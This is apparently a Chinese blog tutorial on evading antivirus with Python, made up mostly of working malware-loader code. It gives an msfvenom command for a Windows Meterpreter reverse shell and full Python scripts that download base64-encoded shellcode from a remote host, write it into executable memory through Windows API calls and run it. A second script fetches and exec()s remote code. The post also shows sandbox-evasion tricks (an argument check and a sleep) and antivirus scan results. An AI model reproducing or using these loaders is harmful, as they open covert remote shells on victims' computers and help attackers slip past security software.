python免杀基础
目录
本文思路:
调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;
1.远程调用shellcode、使用windowAPI;
(1)查杀情况
查杀情况,本文以微步云沙箱、VirusTotal测试为主::
- 微步云(我记得前几天我测的时候才俩,*&狗头)
- VirusTotal(这个多)
(2)连接情况
本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c
连接一样很丝滑
(3)代码情况
- windowAPI加载shellcode
def run1(shellcode):
# windows api
PAGE_EXECUTE_READWRITE = 0x00000040 # 区域可执行代码,可读可写
MEM_COMMIT = 0x3000 # 分配内存
# PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF) # 给予进程所有权限
VirtualAlloc = windll.kernel32.VirtualAlloc
RtlMoveMemory = windll.kernel32.RtlMoveMemory
CreateThread = windll.kernel32.CreateThread
WaitForSingleObject = windll.kernel32.WaitForSingleObject
VirtualAlloc.restype = ctypes.c_void_p # 重载函数返回类型为void
p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) # 申请内存
buf = (c_char * len(shellcode)).from_buffer(shellcode) # 将shellcode指向指针
RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode))) # 复制shellcode进申请的内存中
h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0))) # 执行创建线程
WaitForSingleObject(c_int(h), c_int(-1)) # 检测线程创建事件
以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程
- 对远程加密后的shellcode进行解密
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))
- 完整代码
from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))
def run1(shellcode):
# windows api
PAGE_EXECUTE_READWRITE = 0x00000040 # 区域可执行代码,可读可写
MEM_COMMIT = 0x3000 # 分配内存
# PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF) # 给予进程所有权限
VirtualAlloc = windll.kernel32.VirtualAlloc
RtlMoveMemory = windll.kernel32.RtlMoveMemory
CreateThread = windll.kernel32.CreateThread
WaitForSingleObject = windll.kernel32.WaitForSingleObject
# OpenProcess = windll.kernel32.OpenProcess
# VirtualAllocEx = windll.kernel32.VirtualAllocEx
# WriteProcessMemory = windll.kernel32.WriteProcessMemory
# CreateRemoteThread = windll.kernel32.CreateRemoteThread
VirtualAlloc.restype = ctypes.c_void_p # 重载函数返回类型为void
p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) # 申请内存
buf = (c_char * len(shellcode)).from_buffer(shellcode) # 将shellcode指向指针
RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode))) # 复制shellcode进申请的内存中
h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0))) # 执行创建线程
WaitForSingleObject(c_int(h), c_int(-1)) # 检测线程创建事件
if __name__ == "__main__":
time.sleep(10)
try:
if sys.argv[1]:
run1(shellcode)
except IndexError:
pass
2.远程加载shellcode和执行代码
(1)查杀情况
- 微步云(比上次好点了,以后不传云沙箱了,这次为了分享)
2. VirusTotal
(2)连接情况
本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c
连接和上次一样,秒连
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)
(3)代码情况
完整源代码》》》》
from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time
try:
if sys.argv[1]:
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))
func = requests.get("http://xxx.x.x.x:80xx/uuuu.txt").text
func = base64.b64decode(func)
exec(func)
except IndexError:
pass
3.还有些话要说::
- 免杀主要向特征码检测、行为检测、内存、云查杀,交互流量检测等
- 本次介绍的只是特征码检测和一点行为检测
- 可以扩展的方向有::
- 可以在远程代码加载时次啊用更高级的加密方式(但也就能过静态查杀,添加个用户啥的就凉凉)
- 采用c++编写,不仅文件变小,免杀效果也会更好(同一个shellcode,py打包(pyinstaller)10MB,C++ 200KB)
- 不用远程加载,采用本地加载(还是靠加密方式)
- 后续更深的操作,就不懂了,还在学习,有时间就会分享,,,大佬可以直接喷 ( *&狗头)